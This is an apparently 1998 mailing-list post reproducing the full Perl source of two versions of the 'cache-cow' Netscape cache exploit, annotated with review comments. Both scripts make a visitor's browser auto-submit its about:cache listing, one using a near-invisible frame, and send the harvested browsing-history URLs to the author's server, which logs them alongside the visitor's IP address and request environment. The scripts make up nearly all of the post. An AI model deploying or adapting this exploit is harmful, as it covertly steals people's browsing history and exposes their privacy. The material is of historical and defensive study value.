Hi, Below is source code for the two versions of the Netscape Cache exploit that was recently discovered by Dan Brumleve <nothingat_private>, as found on his web site at http://www.shout.net/~nothing/cache-cow/index.html First version <cache-cow.cgi>, and then second version <view-cache-cow-4.06.cgi> listed.
-----snip-----
#!/usr/bin/perl
#
# cache-cow.cgi -- Dan Brumleve <nothingat_private>, 1998.08.23
#
# Review notes (a defender's reading of the archived script). The archive
# collapsed the file onto a few long lines; line breaks are restored below
# only where Perl needs them (after comments, around heredoc bodies), and
# no token has been changed.
#
# One CGI with three entry points, chosen by the shape of the request:
#   PATH_INFO set      -> serve an auto-submitting form with <base href="about:">
#                         and action=cache, so the browser posts to about:cache.
#   CONTENT_LENGTH set -> receive the harvested link list, append it together
#                         with every CGI environment variable to a per-client
#                         file under logs/, and echo the list back as text.
#   otherwise          -> redirect to this same script with HTML and JavaScript
#                         carried in the URL path.
#
# Every generated page is a heredoc whose words are deliberately broken
# apart, rejoined at runtime by s/\n| //g. As archived that pattern deletes
# every newline *and* every space, which would also merge adjacent HTML
# attributes; since the archive collapsed whitespace runs (the original
# line wraps show up here as single spaces inside words such as "<ba se"),
# the original most likely stripped only line breaks and their indentation.
# NOTE(review): the exact pattern is not verifiable from this copy.
#
# There is no `use strict` / `use warnings`; undefined values and typos go
# unreported.
my $self = "http://www.shout.net/nothing/cache-cow.cgi";
if ($ENV{PATH_INFO}) {
# Glue the heredoc back together and serve it. The relative action "cache"
# resolves against the base "about:" to about:cache, and the onLoad handler
# submits the form as soon as the page loads.
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;
<html><body onLoad="document.f.submit()"><ba se href="about:"><for m name=f action=cache method=post><input type=submit></form></body> </html>
 EOF
} elsif ($ENV{CONTENT_LENGTH}) {
# Read the whole POST body. CONTENT_LENGTH is taken straight from the
# request, so the size of this read is bounded only by what the client
# declares.
my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});
# unescape: form-decode one field ('+' -> space, %XX -> byte). Named subs
# are compiled at load time, so their placement inside this branch is
# cosmetic.
sub unescape{my $s =shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
# extract: split "name=value" on '=' and decode both halves. The value of
# the list assignment, ($n, $v), is what the caller receives.
sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}
# Turn the form body into a name->value hash, take the "cache" field, split
# it into its own "href=<url>" items, drop the "about:" prefix and empty
# values, sort, and join one URL per line. The "#=)" comment must end its
# line: the expression continues on the line after it.
my$history= join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n";
# Append to logs/log-<client address>.txt: every %ENV entry (under the CGI
# convention that includes whatever request headers the server exports), a
# blank line, then the harvested URLs. Two-argument open on a bareword
# handle with the result unchecked, so a failed open silently drops the
# record.
open( FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP $_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);
# Echo the list back to the browser as plain text. "C"."ontent-type" is
# split the same way as the heredoc text, presumably for the same reason.
print"C". "ontent-type: text/plain\n\nHere are the URLs retrieved from your ". "browser:\n\n$history";
} else {
# Initial hit: redirect to $self followed by a path that contains HTML and
# JavaScript. Because the path is non-empty the redirected request has
# PATH_INFO set and lands in the first branch above. The embedded script
# (chunk/moo) joins every document.links entry as "href=<escaped url>" with
# "&", stores the result in the hidden "cache" field and posts it to $self,
# i.e. into the CONTENT_LENGTH branch.
# NOTE(review): this only works if the browser reflects the cached request
# URL unescaped into its about:cache listing so that the markup executes
# there -- inferred from the path contents, not verifiable from this copy.
(my$url=<<" EOF")=~s/ |\n//g;print"Location: $url\n\n";
$self/></a></body><script>function chunk(s){return("href= "+escape(s));}function moo(){if(!document.links.length){r eturn("");}var str=chunk(document.links[0]);var i=documen t.links.length;while(--i){str+="&"+chunk(document.links[i ]);}return(str);}</script><body onLoad="document.f.cache. value=moo();document.f.submit()"><form action="$self" nam e=f method=post><input type=hidden name=cache><input type =submit></form><a href=$self
 EOF
}
exit 0;
-----snip-----
-----snip-----
#!/usr/bin/perl
#
# cache-cow-4.06.cgi -- Dan Brumleve <nothingat_private>, 1998.09.26
#
# Review notes: a second, independent script (its own file; it repeats
# unescape/extract from the first, so the two must not be concatenated).
# The PATH_INFO and CONTENT_LENGTH branches are the same as in
# cache-cow.cgi; the difference is delivery: a frameset shows about:cache
# in one frame and a polling script in another, instead of carrying markup
# in the URL path.
my $self = "http://www.shout.net/nothing/cache-cow-4.06.cgi";
if ($ENV{QUERY_STRING}) {
# The "$self?cow" frame. moo(d) joins d.links as "href=<escaped url>" items;
# check() reads the sibling frame top.cache.document, reloads this frame
# while that document has no links yet, and otherwise stores the list in
# the hidden "cache" field and submits it to $self with target=_top.
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;
<html><head><script>function chunk(s){return("href=" + escape(s));} function moo(d){if(!d.l inks.length){return("");} var str=chunk(d. links[0]);var i=d.links.length;wh ile(--i){str+="&"+chunk(d.links[ i]);} return(s tr);}function check(){ var m=moo(top.cache.document ); if (m=="") { docume nt.location.reload(); return; }document.f.c ache.value=m;doc ument.f.submit();}</script></head><body onLoad="c heck()"><form acti on="$self" name=f target=_top method=post><inpu t type=hidden name=cac he><input type=submit></form></body></html>
 EOF
} elsif ($ENV{PATH_INFO}) {
# The "$self/cache" frame: identical to the first script -- post a form to
# about:cache so that listing loads inside the frame named "cache".
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;
<html><body onLoad="document.f.submit()"><ba se href="about:"><for m name=f action=cache method=post><input type=submit></form></body> </html>
 EOF
} elsif ($ENV{CONTENT_LENGTH}) {
# Collector, token for token the same as in cache-cow.cgi (see the notes
# there: unbounded read of CONTENT_LENGTH, unchecked two-argument open,
# every %ENV entry written to logs/log-<client address>.txt).
my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s =shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history= join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n";
open( FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP $_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C". "ontent-type: text/plain\n\nHere are the URLs retrieved from your ". "browser:\n\n$history";
} else {
# Initial hit: a two-frame page. Frame "cow" (one row unit high, so
# practically invisible) polls; frame "cache" shows about:cache. This
# heredoc is not whitespace-stripped, so it is served as written.
print"Content-type: text/html\n\n".<<" EOF";
<html><head> <frameset rows="1,*"><frame src= "$self?cow" name=cow><frame src="$self/cache" name=cache></frameset></head></html>
 EOF
}
exit 0;
-----snip-----
-- Ken Williams Packet Storm Security http://www.Genocide2600.com/~tattooman/index.shtml E.H.A.P. Corporation http://www.ehap.org/ ehapat_private infoat_private NCSU Comp Sci Dept http://www.csc.ncsu.edu/ jkwilli2at_private PGP DSS/DH/RSA Keys http://www4.ncsu.edu/~jkwilli2/pgpkey/ __________________________________________________ Get Your Private, Free Email at http://www.nsa.gov